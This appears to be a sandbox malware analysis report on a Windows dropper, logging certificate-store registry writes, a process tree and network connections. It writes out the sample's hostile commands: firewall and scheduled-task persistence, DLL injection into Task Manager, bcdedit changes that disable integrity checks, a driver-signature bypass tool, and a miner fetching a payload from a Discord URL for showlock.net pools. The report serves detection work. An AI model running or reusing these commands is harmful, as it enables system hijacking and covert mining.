| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e4030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec5290f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae474040000000100000010000000acb694a59c17e0d791529bb19706a6e420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\rss\csrss.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe
"C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe"
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240509232011.log C:\Windows\Logs\CBS\CbsPersist_20240509232011.cab
C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe
"C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-600186781-696915314161643401-1465218360-293719074-1100429955651495922-203760398"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 30b8b5d5-c0a5-45d6-bce1-80bb6ace5c34.uuid.localstats.org | udp |
| US | 8.8.8.8:53 | msdl.microsoft.com | udp |
| US | 204.79.197.219:443 | msdl.microsoft.com | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard30.blob.core.windows.net | udp |
| US | 20.150.38.228:443 | vsblobprodscussu5shard30.blob.core.windows.net | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard20.blob.core.windows.net | udp |
| US | 20.150.38.228:443 | vsblobprodscussu5shard20.blob.core.windows.net | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | server14.localstats.org | udp |
| US | 8.8.8.8:53 | stun.stunprotocol.org | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| BG | 185.82.216.111:443 | server14.localstats.org | tcp |
| US | 8.8.8.8:53 | carsalessystem.com | udp |
| US | 104.21.94.82:443 | carsalessystem.com | tcp |
| N/A | 127.0.0.1:3478 | udp | |
| US | 8.8.8.8:53 | stun3.l.google.com | udp |
| US | 74.125.250.129:19302 | stun3.l.google.com | udp |
| BG | 185.82.216.111:443 | server14.localstats.org | tcp |
| BG | 185.82.216.111:443 | server14.localstats.org | tcp |
